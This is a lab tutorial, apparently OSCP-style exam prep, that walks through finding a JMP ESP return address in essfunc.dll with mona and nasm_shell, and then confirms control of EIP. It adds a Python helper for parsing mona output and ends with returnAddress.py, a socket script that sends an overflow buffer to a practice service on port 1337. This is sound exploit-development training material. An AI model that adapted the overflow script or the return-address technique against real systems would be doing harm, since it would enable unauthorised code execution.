# Finding a Return Address

## Listing all modules

The following mona command lists every module loaded by the process under test, together with its memory-protection flags. We notice that one of them has none of these protections enabled, which is useful for this attack.

```
!mona modules
```

![](/files/-MdcEK7mMJC8IXbsKA3U)

### Analyzing Output

![](/files/-MdcEjLc-2z3WnMEF-iH)

```
Log data, item 12
 Address=0BADF00D
 Message= 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |  False   | False  | -1.0- [essfunc.dll] (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)
```

Searching through the output, `essfunc.dll` has most of its protections turned off, which would allow this attack to go through.

## Locating the JMP ESP opcode

### Generating the opcode

The next step is to generate the opcode bytes for `JMP ESP` so that we can search for them in `essfunc.dll`. We will use `msf-nasm_shell` for this.

```
msf-nasm_shell
```

![](/files/-MdcF1S96U_79ddxIIug)

### Finding JMP ESP

```
!mona find -s "\xff\xe4" -m "essfunc.dll"
```

![](/files/-MdcH53yncnd1zc3z-WQ)

```
Log data, item 11
 Address=625011AF
 Message=  0x625011af : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)
```

The address of the `JMP ESP` instruction, `0x625011AF`, is our return address.
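As an added example (not part of the original page), the following Python helper parses a `!mona modules` log line like the one above, reports which mitigations the module lacks (the ones a hardening pass would need to add), checks whether a candidate address falls inside the module, and packs the address little-endian as the script below does by hand. The column order Rebase | SafeSEH | ASLR | NXCompat | OS Dll is assumed from mona's module table; the sample line is constructed from the output shown above.

```python
import re
import struct

# Constructed sample in the format printed by "!mona modules" (same module as above).
SAMPLE_LINE = (
    " Message= 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |"
    "  False   | False  | -1.0- [essfunc.dll] (C:\\Users\\admin\\Desktop\\vulnapps\\oscp\\essfunc.dll)"
)

# Assumed order of mona's boolean columns: Rebase | SafeSEH | ASLR | NXCompat | OS Dll
FLAG_NAMES = ("Rebase", "SafeSEH", "ASLR", "NXCompat", "OSDll")


def parse_module_line(line):
    """Return base/top/size, the five flags and the module name from one mona log line."""
    fields = [f.strip() for f in line.split("|")]
    if len(fields) < 9:
        raise ValueError("not a mona module line")
    # The first field is "Message= 0x62500000"; the hex value is its last token.
    base, top, size = (int(f.split()[-1], 16) for f in fields[:3])
    flags = {name: fields[3 + i] == "True" for i, name in enumerate(FLAG_NAMES)}
    m = re.search(r"\[([^\]]+)\]", fields[8])
    return {"name": m.group(1) if m else "?", "base": base, "top": top,
            "size": size, "flags": flags}


def missing_mitigations(module):
    """Mitigations reported as off (OS Dll is informational, not a mitigation)."""
    return [n for n in ("Rebase", "SafeSEH", "ASLR", "NXCompat") if not module["flags"][n]]


def contains_address(module, addr):
    """True if addr lies inside the module's mapped range [base, top)."""
    return module["base"] <= addr < module["top"]


def little_endian_bytes(addr):
    """Pack a 32-bit address as the x86 stack stores it: 0x625011AF -> b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    mod = parse_module_line(SAMPLE_LINE)
    print(mod["name"], "lacks:", ", ".join(missing_mitigations(mod)))
    print("0x625011AF inside module:", contains_address(mod, 0x625011AF))
    print(little_endian_bytes(0x625011AF))
```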

## Hitting Offset

Now that we have a return address, we can set a breakpoint on it and send the buffer to verify that we have full control of EIP.

### Setting breakpoint

![](/files/-MdcHUW6jnVR4pKOtxmz)

Then hit `F2` to set the breakpoint.

![](/files/-MdcH_7uk19AJXh7j-Si)

### returnAddress.py

```
#!/usr/bin/python
import socket

try:
    print("\nSending evil buffer...")

    # Byte strings so the payload is sent unchanged under Python 2 and 3.
    prefix = b"OVERFLOW10 "
    filler = b"A" * 537                 # padding up to the saved return address
    eip = b"\xaf\x11\x50\x62"           # 0x625011AF (JMP ESP in essfunc.dll), little-endian
    buffer = prefix + filler + eip

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("windows.box", 1337))
    s.send(buffer)
    s.close()

    print("\nDone!")

except OSError:
    print("\nCould not connect!")
```

### Hitting breakpoint

```
python returnAddress.py
```

![](/files/-MdcHkV8L6SdjwWlWCbi)

![](/files/-MdcHmOKM2xPd7N0qsJ6)

The debugger shows that execution reached the `JMP ESP` address and stopped at the breakpoint we set earlier.

